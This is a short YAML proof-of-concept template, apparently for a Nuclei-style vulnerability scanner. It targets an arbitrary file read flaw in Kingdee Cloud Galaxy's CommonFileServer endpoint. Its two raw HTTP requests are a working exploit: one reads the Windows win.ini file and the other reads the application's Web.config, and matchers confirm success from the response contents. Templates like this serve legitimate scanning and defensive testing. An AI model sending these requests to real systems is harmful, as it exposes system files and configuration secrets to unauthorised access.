dddd/common/config/pocs/kingdee-commonfileserver-fileread.yaml

id: kingdee-commonfileserver-fileread

info:
  name: 金蝶云星空 CommonFileserver 任意文件读取漏洞
  author: SleepingBag945
  severity: high
  description: |
    金蝶云星空 CommonFileserver 任意文件读取漏洞
  metadata:
  tags: kingdee

http:
  - raw:
      - |
        GET /CommonFileServer/c:/windows/win.ini HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /CommonFileServer/C%3A%5CProgram%20Files%20%28x86%29%5CKingdee%5CK3Cloud%5CWebSite%5CWeb.config HTTP/1.1
        Host: {{Hostname}}

    stop-at-first-match: true
    matchers-condition: or
    matchers:
      - type: dsl
        dsl:
          - status_code_1 == 200
          - contains(body_1,"for 16-bit app support")
        condition: and

      - type: dsl
        dsl:
          - status_code_2 == 200
          - contains(body_2,"<configuration>")
          - contains(body_2,'<?xml version=')
        condition: and